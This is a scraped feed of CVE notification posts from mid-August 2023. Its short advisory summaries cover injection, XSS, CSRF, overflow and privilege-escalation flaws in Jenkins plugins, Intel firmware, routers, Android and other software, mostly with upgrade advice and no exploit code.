🚨 CVE-2023-40037Apache NiFi 1.21.0 through 1.23.0 support JDBC and JNDI JMS access in several Processors and Controller Services with connection URL validation that does not provide sufficient protection against crafted inputs. An authenticated and authorized user can bypass connection URL validation using custom input formatting. The resolution enhances connection URL validation and introduces validation for additional related properties. Upgrading to Apache NiFi 1.23.1 is the recommended mitigation.🎖@cveNotify |
|
| 2023-08-19 00:58:16 |
🚨 CVE-2023-40172Social media skeleton is an uncompleted/framework social media project implemented using a php, css ,javascript and html. A Cross-site request forgery (CSRF) attack is a type of malicious attack whereby an attacker tricks a victim into performing an action on a website that they do not intend to do. This can be done by sending the victim a malicious link or by exploiting a vulnerability in the website. Prior to version 1.0.5 Social media skeleton did not properly restrict CSRF attacks. This has been addressed in version 1.0.5 and all users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-08-19 00:58:15 |
🚨 CVE-2023-40173Social media skeleton is an uncompleted/framework social media project implemented using a php, css ,javascript and html. Prior to version 1.0.5 Social media skeleton did not properly salt passwords leaving user passwords susceptible to cracking should an attacker gain access to hashed passwords. This issue has been addressed in version 1.0.5 and users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-08-19 00:58:14 |
🚨 CVE-2023-40174Social media skeleton is an uncompleted/framework social media project implemented using a php, css ,javascript and html. Insufficient session expiration is a web application security vulnerability that occurs when a web application does not properly manage the lifecycle of a user's session. Social media skeleton releases prior to 1.0.5 did not properly limit manage user session lifecycles. This issue has been addressed in version 1.0.5 and users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-08-19 00:58:13 |
🚨 CVE-2023-40175Puma is a Ruby/Rack web server built for parallelism. Prior to versions 6.3.1 and 5.6.7, puma exhibited incorrect behavior when parsing chunked transfer encoding bodies and zero-length Content-Length headers in a way that allowed HTTP request smuggling. Severity of this issue is highly dependent on the nature of the web site using puma is. This could be caused by either incorrect parsing of trailing fields in chunked transfer encoding bodies or by parsing of blank/zero-length Content-Length headers. Both issues have been addressed and this vulnerability has been fixed in versions 6.3.1 and 5.6.7. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-08-18 22:58:24 |
🚨 CVE-2023-27471An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. UEFI implementations do not correctly protect and validate information contained in the 'MeSetup' UEFI variable. On some systems, this variable can be overwritten using operating system APIs. Exploitation of this vulnerability could potentially lead to denial of service for the platform.🎖@cveNotify |
|
| 2023-08-18 22:58:23 |
🚨 CVE-2023-38910CSZ CMS 1.3.0 is vulnerable to cross-site scripting (XSS), which allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Carousel Wiget' section and choosing our carousel widget created above, in 'Photo URL' and 'YouTube URL' plugin.🎖@cveNotify |
|
| 2023-08-18 22:58:22 |
🚨 CVE-2023-38911A Cross-Site Scripting (XSS) vulnerability in CSZ CMS 1.3.0 allows attackers to execute arbitrary code via a crafted payload to the Gallery parameter in the YouTube URL fields.🎖@cveNotify |
|
| 2023-08-18 22:58:19 |
🚨 CVE-2023-4422Cross-site Scripting (XSS) - Stored in GitHub repository cockpit-hq/cockpit prior to 2.6.3.🎖@cveNotify |
|
| 2023-08-18 22:58:18 |
🚨 CVE-2023-40342Jenkins Flaky Test Handler Plugin 1.2.2 and earlier does not escape JUnit test contents when showing them on the Jenkins UI, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control JUnit report file contents.🎖@cveNotify |
|
| 2023-08-18 22:58:17 |
🚨 CVE-2023-40343Jenkins Tuleap Authentication Plugin 1.1.20 and earlier uses a non-constant time comparison function when validating an authentication token allowing attackers to use statistical methods to obtain a valid authentication token.🎖@cveNotify |
|
| 2023-08-18 22:58:13 |
🚨 CVE-2023-40344A missing permission check in Jenkins Delphix Plugin 3.0.2 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-08-18 22:58:12 |
🚨 CVE-2023-40346Jenkins Shortcut Job Plugin 0.4 and earlier does not escape the shortcut redirection URL, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure shortcut jobs.🎖@cveNotify |
|
| 2023-08-18 22:58:11 |
🚨 CVE-2023-40347Jenkins Maven Artifact ChoiceListProvider (Nexus) Plugin 1.14 and earlier does not set the appropriate context for credentials lookup, allowing attackers with Item/Configure permission to access and capture credentials they are not entitled to.🎖@cveNotify |
|
| 2023-08-18 20:58:38 |
🚨 CVE-2023-31943SQL injection vulnerability found in Online Travel Agency System v.1.0 allows a remote attacker to execute arbitrary code via the ticket_id parameter at ticket_detail.php.🎖@cveNotify |
|
| 2023-08-18 20:58:37 |
🚨 CVE-2023-31944SQL injection vulnerability found in Online Travel Agency System v.1.0 allows a remote attacker to execute arbitrary code via the emp_id parameter at employee_edit.php.🎖@cveNotify |
|
| 2023-08-18 20:58:36 |
🚨 CVE-2023-31945SQL injection vulnerability found in Online Travel Agency System v.1.0 allows a remote attacker to execute arbitrary code via the id parameter at daily_expenditure_edit.php.🎖@cveNotify |
|
| 2023-08-18 20:58:35 |
🚨 CVE-2023-31946File Upload vulnerability found in Online Travel Agency System v.1.0 allows a remote attacker to execute arbitrary code via a crafted PHP file to the artical.php.🎖@cveNotify |
|
| 2023-08-18 20:58:34 |
🚨 CVE-2023-39850Schoolmate v1.3 was discovered to contain multiple SQL injection vulnerabilities via the $courseid and $teacherid parameters at DeleteFunctions.php.🎖@cveNotify |
|
| 2023-08-18 20:58:30 |
🚨 CVE-2023-39851webchess v1.0 was discovered to contain a SQL injection vulnerability via the $playerID parameter at mainmenu.php.🎖@cveNotify |
|
| 2023-08-18 20:58:29 |
🚨 CVE-2023-21273In SDP_AddAttribute of sdp_db.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-08-18 20:58:28 |
🚨 CVE-2022-22646This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Monterey 12.2. A malicious application may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2023-08-18 20:58:27 |
🚨 CVE-2020-36615An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.0.1. Processing a maliciously crafted font may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-08-18 20:58:26 |
🚨 CVE-2023-21234In launchConfirmationActivity of ChooseLockSettingsHelper.java, there is a possible way to enable developer options without the lockscreen PIN due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-08-18 20:58:22 |
🚨 CVE-2023-22444Improper initialization in some Intel(R) NUC 13 Extreme Compute Element, Intel(R) NUC 13 Extreme Kit, Intel(R) NUC 11 Performance Kit, Intel(R) NUC 11 Performance Mini PC, Intel(R) NUC Compute Element, Intel(R) NUC Laptop Kit, Intel(R) NUC Pro Kit, Intel(R) NUC Pro Board and Intel(R) NUC Pro Mini PC BIOS firmware may allow a privileged user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-08-18 20:58:21 |
🚨 CVE-2023-21233In multiple locations of avrc, there is a possible leak of heap data due to uninitialized data. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-08-18 20:58:20 |
🚨 CVE-2023-21232In multiple locations, there is a possible way to retrieve sensor data without permissions due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-08-18 20:58:19 |
🚨 CVE-2023-21231In getIntentForButton of ButtonManager.java, there is a possible way for an unprivileged application to start a non-exported or permission-protected activity due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-08-18 20:58:18 |
🚨 CVE-2023-21230In onAccessPointChanged of AccessPointPreference.java, there is a possible way for unprivileged apps to receive a broadcast about WiFi access point change and its BSSID or SSID due to a precondition check failure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-08-18 20:58:17 |
🚨 CVE-2022-37336Improper input validation in BIOS firmware for some Intel(R) NUC may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-18 20:58:16 |
🚨 CVE-2023-27471An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. UEFI implementations do not correctly protect and validate information contained in the 'MeSetup' UEFI variable. On some systems, this variable can be overwritten using operating system APIs. Exploitation of this vulnerability could potentially lead to denial of service for the platform.🎖@cveNotify |
|
| 2023-08-18 20:58:15 |
🚨 CVE-2023-38890Online Shopping Portal Project 3.1 allows remote attackers to execute arbitrary SQL commands/queries via the login form, leading to unauthorized access and potential data manipulation. This vulnerability arises due to insufficient validation of user-supplied input in the username field, enabling SQL Injection attacks.🎖@cveNotify |
|
| 2023-08-18 20:58:14 |
🚨 CVE-2023-38910CSZ CMS 1.3.0 is vulnerable to cross-site scripting (XSS), which allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Carousel Wiget' section and choosing our carousel widget created above, in 'Photo URL' and 'YouTube URL' plugin.🎖@cveNotify |
|
| 2023-08-18 20:58:13 |
🚨 CVE-2023-38911A Cross-Site Scripting (XSS) vulnerability in CSZ CMS 1.3.0 allows attackers to execute arbitrary code via a crafted payload to the Gallery parameter in the YouTube URL fields.🎖@cveNotify |
|
| 2023-08-18 19:58:22 |
🚨 CVE-2023-4412A vulnerability was found in TOTOLINK EX1200L EN_V9.3.5u.6146_B20201023 and classified as critical. This issue affects the function setWanCfg. The manipulation leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-237515. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-18 19:58:21 |
🚨 CVE-2023-38751Improper authorization vulnerability in Special Interest Group Network for Analysis and Liaison versions 4.4.0 to 4.7.7 allows the authorized API users to view the organization information of the information receiver that is set as "non-disclosure" in the information provision operation.🎖@cveNotify |
|
| 2023-08-18 19:58:20 |
🚨 CVE-2023-0871XXE injection in /rtc/post/ endpoint in OpenMNS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple platforms is vulnerable to XML external entity (XXE) injection, which can be used for instance to force Horizon to make arbitrary HTTP requests to internal and external services. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet. OpenNMS thanks Erik Wynter and Moshe Apelbaum for reporting this issue.🎖@cveNotify |
|
| 2023-08-18 17:58:13 |
🚨 CVE-2023-4407A vulnerability classified as critical was found in Codecanyon Credit Lite 1.5.4. Affected by this vulnerability is an unknown functionality of the file /portal/reports/account_statement of the component POST Request Handler. The manipulation of the argument date1/date2 leads to sql injection. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-237511.🎖@cveNotify |
|
| 2023-08-18 17:58:12 |
🚨 CVE-2023-3452The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. Local File Inclusion is also possible, albeit less useful because it requires that the attacker be able to upload a malicious php file via FTP or some other means into a directory readable by the web server.🎖@cveNotify |
|
| 2023-08-18 14:58:14 |
🚨 CVE-2023-4407A vulnerability classified as critical was found in Codecanyon Credit Lite 1.5.4. Affected by this vulnerability is an unknown functionality of the file /portal/reports/account_statement of the component POST Request Handler. The manipulation of the argument date1/date2 leads to sql injection. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-237511.🎖@cveNotify |
|
| 2023-08-18 14:58:13 |
🚨 CVE-2023-32543Incorrect default permissions in the Intel(R) ITS sofware before version 3.1 may allow authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-18 14:58:12 |
🚨 CVE-2023-27515Cross-site scripting (XSS) for the Intel(R) DSA software before version 23.1.9 may allow unauthenticated user to potentially enable escalation of privilege via network access.🎖@cveNotify |
|
| 2023-08-18 12:58:25 |
🚨 CVE-2023-39445Hidden functionality vulnerability in LAN-WH300N/RE all versions provided by LOGITEC CORPORATION allows an unauthenticated attacker to execute arbitrary code by sending a specially crafted file to the product's certain management console.🎖@cveNotify |
|
| 2023-08-18 12:58:24 |
🚨 CVE-2023-39454Buffer overflow vulnerability in WRC-X1800GS-B v1.13 and earlier, WRC-X1800GSA-B v1.13 and earlier, and WRC-X1800GSH-B v1.13 and earlier allows an unauthenticated attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-08-18 12:58:23 |
🚨 CVE-2023-39944OS command injection vulnerability in WRC-F1167ACF all versions, and WRC-1750GHBK all versions allows an attacker who can access the product to execute an arbitrary OS command by sending a specially crafted request.🎖@cveNotify |
|
| 2023-08-18 12:58:19 |
🚨 CVE-2023-40069OS command injection vulnerability in ELECOM wireless LAN routers allows an attacker who can access the product to execute an arbitrary OS command by sending a specially crafted request. Affected products and versions are as follows: WRC-F1167ACF all versions, WRC-1750GHBK all versions, WRC-1167GHBK2 all versions, WRC-1750GHBK2-I all versions, and WRC-1750GHBK-E all versions.🎖@cveNotify |
|
| 2023-08-18 12:58:18 |
🚨 CVE-2023-32626Hidden functionality vulnerability in LAN-W300N/RS all versions, and LAN-W300N/PR5 all versions allows an unauthenticated attacker to log in to the product's certain management console and execute arbitrary OS commands.🎖@cveNotify |
|
| 2023-08-18 12:58:17 |
🚨 CVE-2023-38132LAN-W451NGR all versions provided by LOGITEC CORPORATION contains an improper access control vulnerability, which allows an unauthenticated attacker to log in to telnet service.🎖@cveNotify |
|
| 2023-08-18 12:58:13 |
🚨 CVE-2023-39415Improper authentication vulnerability in Proself Enterprise/Standard Edition Ver5.61 and earlier, Proself Gateway Edition Ver1.62 and earlier, and Proself Mail Sanitize Edition Ver1.07 and earlier allow a remote unauthenticated attacker to log in to the product's Control Panel and perform an unintended operation.🎖@cveNotify |
|
| 2023-08-18 12:58:12 |
🚨 CVE-2023-37567Command injection vulnerability in ELECOM and LOGITEC wireless LAN routers allows a remote unauthenticated attacker to execute an arbitrary command by sending a specially crafted request to a certain port of the web management page. Affected products and versions are as follows: WRC-1167GHBK3-A v1.24 and earlier, WRC-F1167ACF2 all versions, WRC-600GHBK-A all versions, WRC-733FEBK2-A all versions, WRC-1467GHBK-A all versions, WRC-1900GHBK-A all versions, and LAN-W301NR all versions.🎖@cveNotify |
|
| 2023-08-18 12:58:11 |
🚨 CVE-2023-37563ELECOM wireless LAN routers are vulnerable to sensitive information exposure, which allows a network-adjacent unauthorized attacker to obtain sensitive information. Affected products and versions are as follows: WRC-1167GHBK-S v1.03 and earlier, WRC-1167GEBK-S v1.03 and earlier, WRC-1167FEBK-S v1.04 and earlier, WRC-1167GHBK3-A v1.24 and earlier, WRC-1167FEBK-A v1.18 and earlier, WRC-F1167ACF2 all versions, WRC-600GHBK-A all versions, WRC-733FEBK2-A all versions, WRC-1467GHBK-A all versions, WRC-1467GHBK-S all versions, WRC-1900GHBK-A all versions, and WRC-1900GHBK-S all versions.🎖@cveNotify |
|
| 2023-08-18 10:58:12 |
🚨 CVE-2023-4040The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the eh_callback_handler function in versions up to, and including, 3.7.9. This makes it possible for unauthenticated attackers to modify the order status of arbitrary WooCommerce orders.🎖@cveNotify |
|
| 2023-08-18 05:58:18 |
🚨 CVE-2023-30188Memory Exhaustion vulnerability in ONLYOFFICE Document Server 4.0.3 through 7.3.2 allows remote attackers to cause a denial of service via crafted JavaScript file.🎖@cveNotify |
|
| 2023-08-18 05:58:17 |
🚨 CVE-2023-39666D-Link DIR-842 fw_revA_1-02_eu_multi_20151008 was discovered to contain multiple buffer overflows in the fgets function via the acStack_120 and acStack_220 parameters.🎖@cveNotify |
|
| 2023-08-18 00:58:33 |
🚨 CVE-2023-39971Improper Neutralization of Input During Web Page Generation vulnerability in AcyMailing Enterprise component for Joomla allows XSS. This issue affects AcyMailing Enterprise component for Joomla: 6.7.0-8.6.3.🎖@cveNotify |
|
| 2023-08-18 00:58:32 |
🚨 CVE-2023-39973Improper Access Control vulnerability in AcyMailing Enterprise component for Joomla. It allows the unauthorized removal of attachments from campaigns.🎖@cveNotify |
|
| 2023-08-18 00:58:31 |
🚨 CVE-2023-39974Exposure of Sensitive Information vulnerability in AcyMailing Enterprise component for Joomla. It allows unauthorized actors to get the number of subscribers in a specific list.🎖@cveNotify |
|
| 2023-08-18 00:58:28 |
🚨 CVE-2023-37734EZ softmagic MP3 Audio Converter 2.7.3.700 was discovered to contain a buffer overflow.🎖@cveNotify |
|
| 2023-08-18 00:58:27 |
🚨 CVE-2022-41804Unauthorized error injection in Intel(R) SGX or Intel(R) TDX for some Intel(R) Xeon(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-18 00:58:26 |
🚨 CVE-2022-44611Improper input validation in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via adjacent access.🎖@cveNotify |
|
| 2023-08-18 00:58:22 |
🚨 CVE-2023-31939SQL injection vulnerability found in Online Travel Agency System v.1.0 allows a remote attacker to execute arbitrary code via the costomer_id parameter at customer_edit.php.🎖@cveNotify |
|
| 2023-08-18 00:58:21 |
🚨 CVE-2023-31938SQL injection vulnerability found in Online Travel Agency System v.1.0 allows a remote attacker to execute arbitrary code via the emp_id parameter at employee_detail.php.🎖@cveNotify |
|
| 2023-08-18 00:58:20 |
🚨 CVE-2023-31942Cross Site Scripting vulnerability found in Online Travel Agency System v.1.0 allows a remote attacker to execute arbitrary code via the description parameter in insert.php.🎖@cveNotify |
|
| 2023-08-18 00:58:16 |
🚨 CVE-2023-31944SQL injection vulnerability found in Online Travel Agency System v.1.0 allows a remote attacker to execute arbitrary code via the emp_id parameter at employee_edit.php.🎖@cveNotify |
|
| 2023-08-18 00:58:15 |
🚨 CVE-2023-36106An incorrect access control vulnerability in powerjob 4.3.2 and earlier allows remote attackers to obtain sensitive information via the interface for querying via appId parameter to /container/list.🎖@cveNotify |
|
| 2023-08-17 20:58:45 |
🚨 CVE-2023-39741lrzip v0.651 was discovered to contain a heap overflow via the libzpaq::PostProcessor::write(int) function at /libzpaq/libzpaq.cpp. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted file.🎖@cveNotify |
|
| 2023-08-17 20:58:43 |
🚨 CVE-2023-39743lrzip-next LZMA v23.01 was discovered to contain an access violation via the component /bz3_decode_block src/libbz3.c.🎖@cveNotify |
|
| 2023-08-17 20:58:40 |
🚨 CVE-2023-40313A BeanShell interpreter in remote server mode runs in OpenMNS Horizon versions earlier than 32.0.2 and in related Meridian versions which could allow arbitrary remote Java code execution. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet.🎖@cveNotify |
|
| 2023-08-17 20:58:38 |
🚨 CVE-2023-40272Apache Airflow Spark Provider, versions before 4.1.3, is affected by a vulnerability that allows an attacker to pass in malicious parameters when establishing a connection giving an opportunity to read files on the Airflow server.It is recommended to upgrade to a version that is not affected.🎖@cveNotify |
|
| 2023-08-17 20:58:36 |
🚨 CVE-2023-4382A vulnerability, which was classified as problematic, has been found in tdevs Hyip Rio 2.1. Affected by this issue is some unknown functionality of the file /user/settings of the component Profile Settings. The manipulation of the argument avatar leads to cross site scripting. The attack may be launched remotely. VDB-237314 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-17 20:58:35 |
🚨 CVE-2023-40338Jenkins Folders Plugin 6.846.v23698686f0f6 and earlier displays an error message that includes an absolute path of a log file when attempting to access the Scan Organization Folder Log if no logs are available, exposing information about the Jenkins controller file system.🎖@cveNotify |
|
| 2023-08-17 20:58:33 |
🚨 CVE-2023-40341A cross-site request forgery (CSRF) vulnerability in Jenkins Blue Ocean Plugin 1.27.5 and earlier allows attackers to connect to an attacker-specified URL, capturing GitHub credentials associated with an attacker-specified job.🎖@cveNotify |
|
| 2023-08-17 20:58:32 |
🚨 CVE-2023-40342Jenkins Flaky Test Handler Plugin 1.2.2 and earlier does not escape JUnit test contents when showing them on the Jenkins UI, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control JUnit report file contents.🎖@cveNotify |
|
| 2023-08-17 20:58:30 |
🚨 CVE-2023-40343Jenkins Tuleap Authentication Plugin 1.1.20 and earlier uses a non-constant time comparison function when validating an authentication token allowing attackers to use statistical methods to obtain a valid authentication token.🎖@cveNotify |
|
| 2023-08-17 20:58:26 |
🚨 CVE-2023-40344A missing permission check in Jenkins Delphix Plugin 3.0.2 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-08-17 20:58:25 |
🚨 CVE-2023-40345Jenkins Delphix Plugin 3.0.2 and earlier does not set the appropriate context for credentials lookup, allowing attackers with Overall/Read permission to access and capture credentials they are not entitled to.🎖@cveNotify |
|
| 2023-08-17 20:58:23 |
🚨 CVE-2023-40346Jenkins Shortcut Job Plugin 0.4 and earlier does not escape the shortcut redirection URL, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure shortcut jobs.🎖@cveNotify |
|
| 2023-08-17 20:58:22 |
🚨 CVE-2023-40347Jenkins Maven Artifact ChoiceListProvider (Nexus) Plugin 1.14 and earlier does not set the appropriate context for credentials lookup, allowing attackers with Item/Configure permission to access and capture credentials they are not entitled to.🎖@cveNotify |
|
| 2023-08-17 20:58:20 |
🚨 CVE-2023-40348The webhook endpoint in Jenkins Gogs Plugin 1.0.15 and earlier provides unauthenticated attackers information about the existence of jobs in its output.🎖@cveNotify |
|
| 2023-08-17 20:58:19 |
🚨 CVE-2023-40349Jenkins Gogs Plugin 1.0.15 and earlier improperly initializes an option to secure its webhook endpoint, allowing unauthenticated attackers to trigger builds of jobs.🎖@cveNotify |
|
| 2023-08-17 20:58:18 |
🚨 CVE-2023-40350Jenkins Docker Swarm Plugin 1.11 and earlier does not escape values returned from Docker before inserting them into the Docker Swarm Dashboard view, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control responses from Docker.🎖@cveNotify |
|
| 2023-08-17 20:58:17 |
🚨 CVE-2023-40351A cross-site request forgery (CSRF) vulnerability in Jenkins Favorite View Plugin 5.v77a_37f62782d and earlier allows attackers to add or remove views from another user's favorite views tab bar.🎖@cveNotify |
|
| 2023-08-17 20:58:15 |
🚨 CVE-2023-40336A cross-site request forgery (CSRF) vulnerability in Jenkins Folders Plugin 6.846.v23698686f0f6 and earlier allows attackers to copy folders.🎖@cveNotify |
|
| 2023-08-17 20:58:14 |
🚨 CVE-2023-40337A cross-site request forgery (CSRF) vulnerability in Jenkins Folders Plugin 6.846.v23698686f0f6 and earlier allows attackers to copy a view inside a folder.🎖@cveNotify |
|
| 2023-08-17 20:58:13 |
🚨 CVE-2023-40339Jenkins Config File Provider Plugin 952.va_544a_6234b_46 and earlier does not mask (i.e., replace with asterisks) credentials specified in configuration files when they're written to the build log.🎖@cveNotify |
|
| 2023-08-17 18:58:37 |
🚨 CVE-2018-3657Multiple buffer overflows in Intel AMT in Intel CSME firmware versions before version 12.0.5 may allow a privileged user to potentially execute arbitrary code with Intel AMT execution privilege via local access.🎖@cveNotify |
|
| 2023-08-17 18:58:36 |
🚨 CVE-2017-5698Intel Active Management Technology, Intel Standard Manageability, and Intel Small Business Technology firmware versions 11.0.25.3001 and 11.0.26.3000 anti-rollback will not prevent upgrading to firmware version 11.6.x.1xxx which is vulnerable to CVE-2017-5689 and can be performed by a local user with administrative privileges.🎖@cveNotify |
|
| 2023-08-17 18:58:35 |
🚨 CVE-2023-34419A buffer overflow has been identified in the SetupUtility driver in some Lenovo Notebook products which may allow an attacker with local access and elevated privileges to execute arbitrary code.🎖@cveNotify |
|
| 2023-08-17 18:58:34 |
🚨 CVE-2023-3078An uncontrolled search path vulnerability was reported in the Lenovo Universal Device Client (UDC) that could allow an attacker with local access to execute code with elevated privileges.🎖@cveNotify |
|
| 2023-08-17 18:58:33 |
🚨 CVE-2023-4028A buffer overflow has been identified in the SystemUserMasterHddPwdDxe driver in some Lenovo Notebook products which may allow an attacker with local access and elevated privileges to execute arbitrary code.🎖@cveNotify |
|
| 2023-08-17 18:58:32 |
🚨 CVE-2023-4029A buffer overflow has been identified in the BoardUpdateAcpiDxe driver in some Lenovo ThinkPad products which may allow an attacker with local access and elevated privileges to execute arbitrary code.🎖@cveNotify |
|
| 2023-08-17 18:58:31 |
🚨 CVE-2023-4030A vulnerability was reported in BIOS for ThinkPad P14s Gen 2, P15s Gen 2, T14 Gen 2, and T15 Gen 2 that could cause the system to recover to insecure settings if the BIOS becomes corrupt.🎖@cveNotify |
|
| 2023-08-17 18:58:30 |
🚨 CVE-2023-0871XXE injection in /rtc/post/ endpoint in OpenMNS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple platforms is vulnerable to XML external entity (XXE) injection, which can be used for instance to force Horizon to make arbitrary HTTP requests to internal and external services. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet. OpenNMS thanks Erik Wynter and Moshe Apelbaum for reporting this issue.🎖@cveNotify |
|
| 2023-08-17 18:58:28 |
🚨 CVE-2023-26756The login page of Revive Adserver v5.4.1 is vulnerable to brute force attacks.🎖@cveNotify |
|
| 2023-08-17 18:58:27 |
🚨 CVE-2022-25864Uncontrolled search path in some Intel(R) oneMKL software before version 2022.0 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-17 18:58:23 |
🚨 CVE-2022-27635Improper access control for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi software may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-17 18:58:22 |
🚨 CVE-2022-36351Improper input validation in some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi software may allow an unauthenticated user to potentially enable denial of service via adjacent access.🎖@cveNotify |
|
| 2023-08-17 18:58:21 |
🚨 CVE-2022-37343Improper access control in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-17 18:58:20 |
🚨 CVE-2022-38076Improper input validation in some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi software may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-17 18:58:19 |
🚨 CVE-2022-40964Improper access control for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi software may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-17 18:58:18 |
🚨 CVE-2022-43456Uncontrolled search path in some Intel(R) RST software before versions 16.8.5.1014.5, 17.11.3.1010.2, 18.7.6.1011.2 and 19.5.2.1049.5 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-17 18:58:17 |
🚨 CVE-2022-46329Protection mechanism failure for some Intel(R) PROSet/Wireless WiFi software may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-17 18:58:16 |
🚨 CVE-2023-37511If certain App Transport Security (ATS) settings are set in a certain manner, insecure loading of web content can be achieved.🎖@cveNotify |
|
| 2023-08-17 18:58:15 |
🚨 CVE-2023-26587Improper input validation for the Intel(R) Easy Streaming Wizard software may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-17 18:58:14 |
🚨 CVE-2023-29243Unchecked return value in some Intel(R) RealSense(TM) ID software for Intel(R) RealSense(TM) 450 FA in version 0.25.0 may allow a priviledged user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-08-17 16:58:35 |
🚨 CVE-2021-28500An issue has recently been discovered in Arista EOS where the incorrect use of EOS's AAA API’s by the OpenConfig and TerminAttr agents could result in unrestricted access to the device for local users with nopassword configuration.🎖@cveNotify |
|
| 2023-08-17 16:58:34 |
🚨 CVE-2023-22356Improper initialization in some Intel(R) NUC BIOS firmware may allow a privileged user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-08-17 16:58:33 |
🚨 CVE-2023-32285Improper access control in some Intel(R) NUC BIOS firmware may allow a privileged user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-08-17 16:58:32 |
🚨 CVE-2023-39396Deserialization vulnerability in the input module. Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2023-08-17 16:58:28 |
🚨 CVE-2023-23342If certain local files are manipulated in a certain manner, the validation to use the cryptographic keys can be circumvented. 🎖@cveNotify |
|
| 2023-08-17 16:58:27 |
🚨 CVE-2023-38034A command injection vulnerability in the DHCP Client function of all UniFi Access Points and Switches, excluding the Switch Flex Mini, could allow a Remote Code Execution (RCE). Affected Products:All UniFi Access Points (Version 6.5.53 and earlier)All UniFi Switches (Version 6.5.32 and earlier) -USW Flex Mini excluded. Mitigation:Update UniFi Access Points to Version 6.5.62 or later.Update UniFi Switches to Version 6.5.59 or later.🎖@cveNotify |
|
| 2023-08-17 16:58:26 |
